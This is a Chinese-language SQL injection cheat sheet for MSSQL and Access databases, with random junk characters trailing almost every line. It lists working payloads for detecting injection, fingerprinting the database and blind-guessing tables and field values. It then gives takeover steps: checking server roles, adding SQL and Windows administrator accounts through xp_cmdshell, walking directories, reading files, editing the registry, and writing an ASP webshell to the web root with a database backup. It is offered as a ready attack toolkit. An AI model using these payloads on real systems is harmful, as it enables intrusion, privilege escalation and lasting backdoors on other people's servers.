1.判断是否有注入;and 1=1 ;and 1=2 xH!{;i
2.初步判断是否是mssql ;and user>0 w0(A7L:L
ZNNgi@6>
3.注入参数是字符'and [查询条件] and ''=' U@yn%k9
@U08v_,
4.搜索时没过滤参数的'and [查询条件] and '%25'=' }"BXqh"\`
#9uNJla
5.判断数据库系统 ?(UeWLC#
42kr&UY&
;and (select count(*) from sysobjects)>0 mssql %/NB263Db
:t+XW`eQR:
;and (select count(*) from msysobjects)>0 access MgyV{`
t$m~O?I
8`l bKV
:1NF#-2\f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Y4q;
~'k.'O{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 musZCg$
'|V"!R)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,\ [R\s
YMx]i,u'+
9.(1)猜字段的ascii值(access) f-&4x_5
VgLrufJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 #lXwBfBMf
:23w[vt=
(2)猜字段的ascii值(mssql) ".Z|zt6C
aGY R:jR$
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 IGqg,OEAp
LldZ"%P
10.测试权限结构(mssql) s>hNwb/
*\><MXx
8i"v7}
_dCdyf
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >qkZn7C
,Axk\7-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- DtLga[M
VJquB8?H
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- %"kF i
r/o1a't;
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- uL| Wuq
o6L\39v_
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hq[;QF:B
}n /6.%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- d^AXhQjQN-
\>,[5|GU
;and 1=(select IS_MEMBER('db_owner'));-- &p|+K
XIf
tP/0_^m
b?S,%
x UM,"+h
11.添加mssql和系统的帐户 otTv,T182
?Vg251-H
;exec master.dbo.sp_addlogin username;-- jNRR=0
;exec master.dbo.sp_password null,username,password;-- RN2^=$'.
Itaq4 ^CE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Y~vyCU5nWR
W.u+R?a=
;exec master.dbo.xp_cmdshell 'net user username password UqHk2h-
x~3N})T5
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;\1/4;m
hc#LniR3$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- o3C7JG
REqQJ7a/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- NPc@;g]d"
ePF)wl;m
#yPQt!
APye
12.(1)遍历目录 !j8.JP}!)
j~DTvWg<Jl
;create table dirs(paths varchar(100), id int) ]k0Pe;<
YO&=fd*
;insert dirs exec master.dbo.xp_dirtree 'c:\' i3
?cL4
n[|*[II
;and (select top 1 paths from dirs)>0 K,B qVu
i{T mn
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1{%3OG^'
$wnK"k%G
LTsX{z
EL/~c*a/
(2)遍历目录 C=k]g
(x)}k&B;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <V?csx/eRd
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @-B)a Z
al#BfcZW
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 =17d7#-
R9+0ZoS
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 K+WbxovXU
w8(8n&5
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 jg)+]r/hS
3:H[S_q
S=f:-?N|
UYLCzv~W
13.mssql中的存储过程 ,oin<K
,Q%q!#@
xp_regenumvalues 注册表根键, 子键 z?Hi
u6c-
/2s=;tA1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Hsdcv~Xr;l
kD}w5 U
xp_regread 根键,子键,键值名 ZwzN=03T
u4eA++eT
;exec xp_regread G+5_I"`W
As}3VBd
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值 ?ZF~U
{e35O(Y
xp_regwrite 根键,子键, 值名, 值类型, 值 \}Hi\k+h':
>_3P6-L>
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 FGRdA^`
P]A~:Lj
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 +Oxw?`I$
5u5-:#sLy
xp_regdeletevalue 根键,子键,值名 =\ek;d0Tqb
ScCp88KpFI
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 6y0CEly>3#
Cf~vT"
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 LdH23\
U))2?#
#B$r|rqamq
s!g06F
14.mssql的backup创建webshell 59R%g .2Y
;:WM^S
use model uge~*S
r*F^8_YMK
create table cmd(str image); xGkc_
6 d;_}
insert into cmd(str) values (''); 4{v?<x8
6?`3zdOeO
backup database model to disk='c:\l.asp'; c*!xdK
6&,{"N0T
, tEd>
~9We)FvU4
15.mssql内置函数 S\poa:D`
f,(@K%
;and (select @@version)>0 获得Windows的版本号 6,raRg6
;5dA
;and user_name()='dbo' 判断当前系统的连接用户是不是sa bxc!x>)
SuJa?VU1w
;and (select user_name())>0 爆当前系统的连接用户 fD* ?JzVY
qx'F9I
;and (select db_name())>0 得到当前连接的数据库 #;(Q \
Z@ dS,M*
hY(q@_s
#qcF2&a%
16.简洁的webshell c,,(s{1
-s_=4U,
use model zcE`.)y
p|`[8uY?
create table cmd(str image); K%@#a}kRb
Ib}~Q@?2
insert into cmd(str) values (''); IM(=j
D:56>%y@
backup database model to disk='g:\wwwtest\l.asp';